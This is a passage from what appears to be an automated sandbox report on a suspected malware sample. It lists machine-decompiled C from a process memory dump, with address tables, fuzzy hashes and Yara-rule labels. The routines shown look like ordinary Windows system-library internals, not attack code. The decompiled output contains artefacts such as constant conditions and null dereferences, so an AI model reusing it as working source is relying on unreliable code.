							_t75 =  *0x1746d5c; // 0x7fbc0654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1746d5c; // 0x7fbc0654
							_t84 =  *0x1746d5c; // 0x7fbc0654
							_t87 =  *0x1746d5c; // 0x7fbc0654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E0169F3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                      0x01682ae4
                                                      0x01682aec
                                                      0x01682aef
                                                      0x01682af4
                                                      0x01682af7
                                                      0x01682afd
                                                      0x01682b92
                                                      0x01682b92
                                                      0x01682b97
                                                      0x01682b9c
                                                      0x01682b9c
                                                      0x01682b03
                                                      0x01682b06
                                                      0x01682b09
                                                      0x01682b09
                                                      0x01682b0f
                                                      0x01682b15
                                                      0x01682b15
                                                      0x01682b1b
                                                      0x01682b1e
                                                      0x01682b21
                                                      0x01682b26
                                                      0x01682b29
                                                      0x01682b81
                                                      0x01682b84
                                                      0x01682c0e
                                                      0x01682c15
                                                      0x01682c24
                                                      0x01682c24
                                                      0x01682b8a
                                                      0x01682b8a
                                                      0x01682b8a
                                                      0x01682b8a
                                                      0x01682b90
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01682b4a
                                                      0x01682b4a
                                                      0x01682b4d
                                                      0x01682b53
                                                      0x00000000
                                                      0x00000000
                                                      0x01682b55
                                                      0x01682b58
                                                      0x01682bb7
                                                      0x016c5d1b
                                                      0x016c5d37
                                                      0x016c5d47
                                                      0x016c5d53
                                                      0x01682bbd
                                                      0x01682bbd
                                                      0x01682bbd
                                                      0x01682bb7
                                                      0x01682b5d
                                                      0x01682c2f
                                                      0x016c5d5b
                                                      0x016c5d77
                                                      0x016c5d87
                                                      0x016c5d93
                                                      0x01682c35
                                                      0x01682c35
                                                      0x01682c35
                                                      0x01682c2f
                                                      0x01682b65
                                                      0x01682b9f
                                                      0x01682ba2
                                                      0x01682b67
                                                      0x01682b67
                                                      0x01682b69
                                                      0x01682b6b
                                                      0x01682b6e
                                                      0x01682bc9
                                                      0x01682bcc
                                                      0x01682bcf
                                                      0x01682bd4
                                                      0x01682bd6
                                                      0x01682bd6
                                                      0x01682bdb
                                                      0x01682c02
                                                      0x01682c05
                                                      0x01682c07
                                                      0x00000000
                                                      0x01682c07
                                                      0x01682be0
                                                      0x01682c00
                                                      0x01682c3f
                                                      0x01682c3f
                                                      0x00000000
                                                      0x01682c00
                                                      0x01682be5
                                                      0x01682be7
                                                      0x01682bec
                                                      0x01682bf4
                                                      0x01682bf6
                                                      0x00000000
                                                      0x01682bf6
                                                      0x01682b70
                                                      0x01682b76
                                                      0x01682b2b
                                                      0x01682b2b
                                                      0x01682b2d
                                                      0x01682b2f
                                                      0x01682b32
                                                      0x01682b35
                                                      0x01682b3a
                                                      0x00000000
                                                      0x01682b40
                                                      0x01682b43
                                                      0x01682b45
                                                      0x01682b47
                                                      0x01682b4a
                                                      0x01682b4d
                                                      0x01682b53
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01682b53
                                                      0x01682b78
                                                      0x01682b78
                                                      0x01682b7b
                                                      0x01682b7e
                                                      0x00000000
                                                      0x01682b7e
                                                      0x01682b76
                                                      0x01682ba5
                                                      0x01682ba5
                                                      0x01682ba8
                                                      0x01682bad
                                                      0x00000000
                                                      0x00000000
                                                      0x01682baf
                                                      0x01682baf
                                                      0x01682bc2
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 24f70ec17abfe69b81ae695ec78f41cd2f417a90adb14a05f804f7b252f59efc
                                                      • Instruction ID: c0ba67a1caa4cfed9a33f7eff79ff754f082be1d63767f398e6ce71c77a498b3
                                                      • Opcode Fuzzy Hash: 24f70ec17abfe69b81ae695ec78f41cd2f417a90adb14a05f804f7b252f59efc
                                                      • Instruction Fuzzy Hash: 4151D2B6A00115CFCB14EF5CCCA09BDB7F1FB88704706865EE8469B315E734AA91CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0171AE44, Relevance: .2, Instructions: 152COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E0171AE44(signed char __ecx, signed int __edx, signed int _a4, signed char _a8, signed int* _a12) {
				signed int _v8;
				signed int _v12;
				void* __esi;
				void* __ebp;
				signed short* _t36;
				signed int _t41;
				char* _t42;
				intOrPtr _t43;
				signed int _t47;
				void* _t52;
				signed int _t57;
				intOrPtr _t61;
				signed char _t62;
				signed int _t72;
				signed char _t85;
				signed int _t88;

				_t73 = __edx;
				_push(__ecx);
				_t85 = __ecx;
				_v8 = __edx;
				_t61 =  *((intOrPtr*)(__ecx + 0x28));
				_t57 = _a4 |  *(__ecx + 0xc) & 0x11000001;
				if(_t61 != 0 && _t61 ==  *((intOrPtr*)( *[fs:0x18] + 0x24))) {
					_t57 = _t57 | 0x00000001;
				}
				_t88 = 0;
				_t36 = 0;
				_t96 = _a12;
				if(_a12 == 0) {
					_t62 = _a8;
					__eflags = _t62;
					if(__eflags == 0) {
						goto L12;
					}
					_t52 = E0171C38B(_t85, _t73, _t57, 0);
					_t62 = _a8;
					 *_t62 = _t52;
					_t36 = 0;
					goto L11;
				} else {
					_t36 = E0171ACFD(_t85, _t73, _t96, _t57, _a8);
					if(0 == 0 || 0 == 0xffffffff) {
						_t72 = _t88;
					} else {
						_t72 =  *0x00000000 & 0x0000ffff;
					}
					 *_a12 = _t72;
					_t62 = _a8;
					L11:
					_t73 = _v8;
					L12:
					if((_t57 & 0x01000000) != 0 ||  *((intOrPtr*)(_t85 + 0x20)) == _t88) {
						L19:
						if(( *(_t85 + 0xc) & 0x10000000) == 0) {
							L22:
							_t74 = _v8;
							__eflags = _v8;
							if(__eflags != 0) {
								L25:
								__eflags = _t88 - 2;
								if(_t88 != 2) {
									__eflags = _t85 + 0x44 + (_t88 << 6);
									_t88 = E0171FDE2(_t85 + 0x44 + (_t88 << 6), _t74, _t57);
									goto L34;
								}
								L26:
								_t59 = _v8;
								E0171EA55(_t85, _v8, _t57);
								asm("sbb esi, esi");
								_t88 =  ~_t88;
								_t41 = E01677D50();
								__eflags = _t41;
								if(_t41 == 0) {
									_t42 = 0x7ffe0380;
								} else {
									_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
								}
								__eflags =  *_t42;
								if( *_t42 != 0) {
									_t43 =  *[fs:0x30];
									__eflags =  *(_t43 + 0x240) & 0x00000001;
									if(( *(_t43 + 0x240) & 0x00000001) != 0) {
										__eflags = _t88;
										if(_t88 != 0) {
											E01711608(_t85, _t59, 3);
										}
									}
								}
								goto L34;
							}
							_push(_t62);
							_t47 = E01721536(0x1748ae4, (_t74 -  *0x1748b04 >> 0x14) + (_t74 -  *0x1748b04 >> 0x14), _t88, __eflags);
							__eflags = _t47;
							if(_t47 == 0) {
								goto L26;
							}
							_t74 = _v12;
							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L0171C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E0171A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E016FCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E0171ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                                      0x0171ae44
                                                      0x0171ae4c
                                                      0x0171ae53
                                                      0x0171ae55
                                                      0x0171ae5c
                                                      0x0171ae64
                                                      0x0171ae68
                                                      0x0171ae75
                                                      0x0171ae75
                                                      0x0171ae78
                                                      0x0171ae7a
                                                      0x0171ae7c
                                                      0x0171ae7f
                                                      0x0171aea8
                                                      0x0171aeab
                                                      0x0171aead
                                                      0x00000000
                                                      0x00000000
                                                      0x0171aeb3
                                                      0x0171aeb8
                                                      0x0171aebb
                                                      0x0171aebd
                                                      0x00000000
                                                      0x0171ae81
                                                      0x0171ae88
                                                      0x0171ae8f
                                                      0x0171ae9b
                                                      0x0171ae96
                                                      0x0171ae96
                                                      0x0171ae96
                                                      0x0171aea0
                                                      0x0171aea3
                                                      0x0171aebf
                                                      0x0171aebf
                                                      0x0171aec3
                                                      0x0171aec9
                                                      0x0171af0d
                                                      0x0171af14
                                                      0x0171af3d
                                                      0x0171af3d
                                                      0x0171af41
                                                      0x0171af44
                                                      0x0171af67
                                                      0x0171af67
                                                      0x0171af6a
                                                      0x0171afca
                                                      0x0171afd1
                                                      0x00000000
                                                      0x0171afd1
                                                      0x0171af6c
                                                      0x0171af6d
                                                      0x0171af75
                                                      0x0171af7c
                                                      0x0171af7e
                                                      0x0171af80
                                                      0x0171af85
                                                      0x0171af87
                                                      0x0171af99
                                                      0x0171af89
                                                      0x0171af92
                                                      0x0171af92
                                                      0x0171af9e
                                                      0x0171afa1
                                                      0x0171afa3
                                                      0x0171afa9
                                                      0x0171afb0
                                                      0x0171afb2
                                                      0x0171afb4
                                                      0x0171afbc
                                                      0x0171afbc
                                                      0x0171afb4
                                                      0x0171afb0
                                                      0x00000000
                                                      0x0171afa1
                                                      0x0171af4f
                                                      0x0171af57
                                                      0x0171af5c
                                                      0x0171af5e
                                                      0x00000000
                                                      0x00000000
                                                      0x0171af60
                                                      0x0171af64
                                                      0x0171af64
                                                      0x00000000
                                                      0x0171af64
                                                      0x0171af1a
                                                      0x0171af25
                                                      0x00000000
                                                      0x00000000
                                                      0x0171af27
                                                      0x0171af28
                                                      0x0171af33
                                                      0x00000000
                                                      0x0171aed0
                                                      0x0171aed0
                                                      0x0171aed2
                                                      0x0171aee1
                                                      0x0171aee4
                                                      0x00000000
                                                      0x00000000
                                                      0x0171aee6
                                                      0x0171aeec
                                                      0x00000000
                                                      0x00000000
                                                      0x0171aefb
                                                      0x0171af07
                                                      0x0171afd3
                                                      0x0171afdb
                                                      0x0171afdb
                                                      0x00000000
                                                      0x0171af07
                                                      0x0171aed6
                                                      0x0171aed8
                                                      0x0171aedf
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0171aedf
                                                      0x0171aec9

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9a12f01be48b69417a211b3b839228447fc37832822dbdfd45d47be5fb1f15f0
                                                      • Instruction ID: c8e6f2fe17a81ca9dfbb7506c1676ecb545b062ef6b7ed16935d89839b5eb19b
                                                      • Opcode Fuzzy Hash: 9a12f01be48b69417a211b3b839228447fc37832822dbdfd45d47be5fb1f15f0
                                                      • Instruction Fuzzy Hash: 3941F3B17022929BD726CA2DC894F3BFB9EEF94620F044219F916872DCDB34D905C691
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0167DBE9, Relevance: .1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E0167DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0165CC50(E01654510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01677D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E01728ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01672280(_t58, _v44);
						E0167DD82(_v44, _t102, _t98);
						E0167B944(_t102, _v5);
						return E0166FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1748628; // 0x0
							_v28 = _t67;
							_t68 =  *0x174862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1748628; // 0x0
						_t105 = _v28;
						_t80 =  *0x174862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x171fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                      0x0167dbe9
                                                      0x0167dbf2
                                                      0x0167dbf7
                                                      0x0167dbf9
                                                      0x0167dbfc
                                                      0x0167dc00
                                                      0x0167dc03
                                                      0x0167dc14
                                                      0x0167dd54
                                                      0x0167dd54
                                                      0x0167dd54
                                                      0x0167dc18
                                                      0x0167dc1d
                                                      0x0167dc1d
                                                      0x0167dc32
                                                      0x0167dc3b
                                                      0x0167dc3e
                                                      0x0167dc46
                                                      0x0167dd5b
                                                      0x0167dd62
                                                      0x0167dd64
                                                      0x0167dd67
                                                      0x0167dd69
                                                      0x0167dd6b
                                                      0x0167dd6e
                                                      0x0167dd70
                                                      0x0167dd73
                                                      0x0167dd73
                                                      0x00000000
                                                      0x0167dc4c
                                                      0x0167dc4e
                                                      0x016c3ae3
                                                      0x016c3ae8
                                                      0x016c3aea
                                                      0x0167dce7
                                                      0x0167dce9
                                                      0x0167dcec
                                                      0x0167dcee
                                                      0x0167dcf0
                                                      0x0167dcf3
                                                      0x0167dcf5
                                                      0x016c3af2
                                                      0x016c3af5
                                                      0x016c3af5
                                                      0x0167dd06
                                                      0x0167dd08
                                                      0x0167dd0b
                                                      0x0167dd12
                                                      0x016c3b08
                                                      0x0167dd18
                                                      0x0167dd18
                                                      0x0167dd18
                                                      0x0167dd20
                                                      0x0167dd23
                                                      0x016c3b16
                                                      0x016c3b16
                                                      0x0167dd29
                                                      0x0167dd2d
                                                      0x0167dd36
                                                      0x0167dd40
                                                      0x0167dd51
                                                      0x0167dd51
                                                      0x0167dc54
                                                      0x0167dc59
                                                      0x0167dc59
                                                      0x0167dc5e
                                                      0x0167dc5e
                                                      0x0167dc63
                                                      0x0167dc66
                                                      0x0167dc6b
                                                      0x0167dc78
                                                      0x0167dc7b
                                                      0x0167dc81
                                                      0x0167dc81
                                                      0x0167dc83
                                                      0x0167dc89
                                                      0x00000000
                                                      0x00000000
                                                      0x0167dd7b
                                                      0x0167dd7b
                                                      0x0167dc8f
                                                      0x0167dc8f
                                                      0x0167dc92
                                                      0x0167dc99
                                                      0x0167dc9f
                                                      0x0167dca5
                                                      0x0167dcaa
                                                      0x0167dcaa
                                                      0x0167dcb3
                                                      0x0167dcb8
                                                      0x0167dcbb
                                                      0x0167dcc1
                                                      0x0167dccf
                                                      0x0167dcd2
                                                      0x0167dcd5
                                                      0x0167dcd7
                                                      0x0167dcda
                                                      0x0167dcdc
                                                      0x0167dcdc
                                                      0x0167dce2
                                                      0x0167dce4
                                                      0x00000000
                                                      0x0167dce4

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 082e2068e0ec6997c9692617c024fe69358200e0ac949c0aff0805629d2b9167
                                                      • Instruction ID: 4a509e0162dae91c2058c9d90a791eedc16d107a92690fc99871400c7133d80c
                                                      • Opcode Fuzzy Hash: 082e2068e0ec6997c9692617c024fe69358200e0ac949c0aff0805629d2b9167
                                                      • Instruction Fuzzy Hash: B251CF76A00206CFCB14CFACC880AAEFBF6FF48310F24855AD955A7341DB31A985CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0166EF40, Relevance: .1, Instructions: 147COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E0166EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E01659080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x77dfc21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E01652D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                                      0x0166ef4b
                                                      0x0166ef4d
                                                      0x0166ef57
                                                      0x0166f0bd
                                                      0x0166f0c2
                                                      0x0166f0d2
                                                      0x0166f0d2
                                                      0x0166f0c2
                                                      0x0166ef5d
                                                      0x0166ef5f
                                                      0x0166ef67
                                                      0x0166ef6a
                                                      0x0166ef6d
                                                      0x0166ef74
                                                      0x0166ef7f
                                                      0x0166ef82
                                                      0x0166ef82
                                                      0x0166ef86
                                                      0x0166ef88
                                                      0x0166ef8c
                                                      0x0166ef8f
                                                      0x0166ef8f
                                                      0x0166ef8f
                                                      0x00000000
                                                      0x0166ef91
                                                      0x0166ef93
                                                      0x0166efc4
                                                      0x0166efc4
                                                      0x0166efc4
                                                      0x0166efca
                                                      0x0166efd0
                                                      0x0166f0a6
                                                      0x00000000
                                                      0x00000000
                                                      0x0166f0af
                                                      0x016bbb06
                                                      0x016bbb0a
                                                      0x0166f0b5
                                                      0x0166f0b5
                                                      0x0166f0b5
                                                      0x0166f0b5
                                                      0x00000000
                                                      0x0166efd6
                                                      0x0166efd9
                                                      0x0166f0de
                                                      0x0166f0e2
                                                      0x0166efdf
                                                      0x0166efdf
                                                      0x0166efdf
                                                      0x0166efe5
                                                      0x016bbafc
                                                      0x016bbafc
                                                      0x0166efe5
                                                      0x0166efeb
                                                      0x0166efed
                                                      0x0166f00f
                                                      0x0166f011
                                                      0x0166f01a
                                                      0x0166f01d
                                                      0x0166f021
                                                      0x0166f028
                                                      0x0166f029
                                                      0x0166f029
                                                      0x0166f02c
                                                      0x00000000
                                                      0x0166f02c
                                                      0x0166eff3
                                                      0x0166eff9
                                                      0x0166f0ea
                                                      0x0166f0ed
                                                      0x0166f0ef
                                                      0x00000000
                                                      0x0166f0ef
                                                      0x0166f003
                                                      0x016bbb12
                                                      0x0166f045
                                                      0x0166f049
                                                      0x0166f051
                                                      0x0166f09e
                                                      0x0166f0a0
                                                      0x0166f0a0
                                                      0x0166f09e
                                                      0x0166f053
                                                      0x0166f064
                                                      0x0166f064
                                                      0x0166f06b
                                                      0x016bbb1a
                                                      0x016bbb1a
                                                      0x0166f071
                                                      0x0166f071
                                                      0x0166f07d
                                                      0x0166f082
                                                      0x0166f08f
                                                      0x0166f08f
                                                      0x0166f009
                                                      0x0166f00d
                                                      0x00000000
                                                      0x0166f00d
                                                      0x0166efd0
                                                      0x0166ef97
                                                      0x0166efa5
                                                      0x0166efaa
                                                      0x00000000
                                                      0x0166efac
                                                      0x0166efac
                                                      0x0166efac
                                                      0x00000000
                                                      0x0166efb2
                                                      0x0166f036
                                                      0x0166f03a
                                                      0x0166f040
                                                      0x0166f090
                                                      0x00000000
                                                      0x0166f092
                                                      0x0166f042
                                                      0x00000000
                                                      0x0166f042
                                                      0x0166efb7
                                                      0x0166efb9
                                                      0x0166efbc
                                                      0x0166efb0
                                                      0x0166efb0
                                                      0x00000000
                                                      0x0166efbe
                                                      0x0166efbe
                                                      0x0166efc1
                                                      0x00000000
                                                      0x0166efc1
                                                      0x0166efbc
                                                      0x0166efaa
                                                      0x0166ef91

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                      • Instruction ID: 61b51ebe38199747b94d09587b73ada6d52f78f1e39c6a4f695f4517a0254b8c
                                                      • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                                      • Instruction Fuzzy Hash: A7510434E04245EFEB25CB6CD9E07EEBBB5AF05314F1881E8D54553382C376A989C741
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0172740D, Relevance: .1, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E0172740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E016AD4F0(_t7, _t84[2], _t87) == _t87) {
